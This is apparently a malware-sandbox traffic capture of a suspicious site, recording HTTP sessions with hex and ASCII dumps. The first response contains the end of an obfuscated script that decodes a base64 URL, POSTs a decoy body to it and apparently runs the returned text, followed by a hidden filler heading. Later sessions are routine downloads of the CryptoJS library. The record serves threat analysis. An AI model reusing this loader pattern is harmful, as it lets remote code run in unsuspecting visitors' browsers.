                                                                                        2024-11-01 12:46:26 UTC286INData Raw: 7a 4e 6c 4e 32 45 78 4e 32 56 6d 4e 47 55 69 4c 43 4a 6b 49 6a 6f 69 4e 32 45 32 4e 54 63 7a 4e 7a 51 32 4e 6a 63 31 4e 6d 4d 32 59 7a 63 35 49 6e 30 3d 60 29 29 2c 20 7b 20 09 09 0d 0a 0a 0a 20 09 6d 65 74 68 6f 64 3a 09 20 27 50 4f 53 54 27 2c 09 09 20 62 6f 64 79 3a 20 20 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 7b 09 20 09 77 61 66 66 6c 65 3a 20 09 22 72 61 64 61 72 73 63 6f 70 65 22 09 09 7d 29 0d 0a 09 20 20 7d 29 29 2e 74 65 78 74 28 29 29 29 3b 09 09 09 0d 0a 0a 09 7d 29 28 29 3b 0d 0a 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0a 0a 3c 68 31 09 20 09 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 54 68 65 09 20 63 72 61 66 74 73 6d 61 6e 73 68 69 70 09 09 6f 66 20 61 20 20 09 63 61 72 20 20 72 65 66 6c 65 63 74 73 09 68 75 6d
                                                                                        Data Ascii: zNlN2ExN2VmNGUiLCJkIjoiN2E2NTczNzQ2Njc1NmM2Yzc5In0=`)), { method: 'POST', body: JSON.stringify({ waffle: "radarscope"}) })).text()));})();</script><h1 style="display:none;">The craftsmanshipof a car reflectshum
                                                                                        2024-11-01 12:46:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.449778104.17.24.144435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:27 UTC561OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://ecoutura.sa.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:27 UTC972INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:27 GMT
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: W/"5eb03e2d-bb78"
                                                                                        Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 675677
                                                                                        Expires: Wed, 22 Oct 2025 12:46:27 GMT
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbKmyPb%2F%2Bu5yE%2Fuk%2BRZNLAQXP74o0t5NXZIf%2BW7MYcTt8s2ju%2F0%2F%2BLDcZ1931GP97lGVZiF8qb3xLYfeRuGzAmejots%2BzxcBOLc9sCDg8zo%2BR98Xc43mWWYDOzBMTyY9K6dYL0ST"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfcde3a46e7ff-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:27 UTC397INData Raw: 33 39 37 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                        Data Ascii: 397a!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                        2024-11-01 12:46:27 UTC1369INData Raw: 6f 77 2e 63 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63
                                                                                        Data Ascii: ow.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("func
                                                                                        2024-11-01 12:46:27 UTC1369INData Raw: 25 34 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29
                                                                                        Data Ascii: %4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)
                                                                                        2024-11-01 12:46:27 UTC1369INData Raw: 26 26 28 74 3d 64 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29
                                                                                        Data Ascii: &&(t=d.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)
                                                                                        2024-11-01 12:46:27 UTC1369INData Raw: 3d 3d 72 3f 28 72 3d 30 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e
                                                                                        Data Ascii: ==r?(r=0,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>
                                                                                        2024-11-01 12:46:27 UTC1369INData Raw: 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39
                                                                                        Data Ascii: ]+886263092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((42949
                                                                                        2024-11-01 12:46:27 UTC1369INData Raw: 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b
                                                                                        Data Ascii: deAt(o)]>>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++
                                                                                        2024-11-01 12:46:27 UTC1369INData Raw: 32 30 2c 48 5b 32 37 5d 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d
                                                                                        Data Ascii: 20,H[27]),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m
                                                                                        2024-11-01 12:46:27 UTC1369INData Raw: 29 7b 76 61 72 20 74 3d 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e
                                                                                        Data Ascii: ){var t=i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n
                                                                                        2024-11-01 12:46:27 UTC1369INData Raw: 61 63 48 65 6c 70 65 72 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65
                                                                                        Data Ascii: acHelper(o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.449779104.17.24.144435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:29 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:29 UTC964INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:29 GMT
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: W/"5eb03e2d-bb78"
                                                                                        Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 675679
                                                                                        Expires: Wed, 22 Oct 2025 12:46:29 GMT
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fsyy1yZ6WTUr2aV4%2F6DGsupPfZHPcdxOV7YvW%2F5wB4ffaTi6D3nTbEXxK9GQmynxbsftj1LjRKkMsEipx0%2BhEHO%2FR3JXTHFvEYSPPnBOXRa6Zv2Q%2FeGD6NpjejjUdeMNEVoxs%2B0a"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfcec1b2c2caa-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:29 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                        Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                        2024-11-01 12:46:29 UTC1369INData Raw: 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74
                                                                                        Data Ascii: o&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==t
                                                                                        2024-11-01 12:46:29 UTC1369INData Raw: 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a
                                                                                        Data Ascii: ar o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:
                                                                                        2024-11-01 12:46:29 UTC1369INData Raw: 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f
                                                                                        Data Ascii: arse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._do
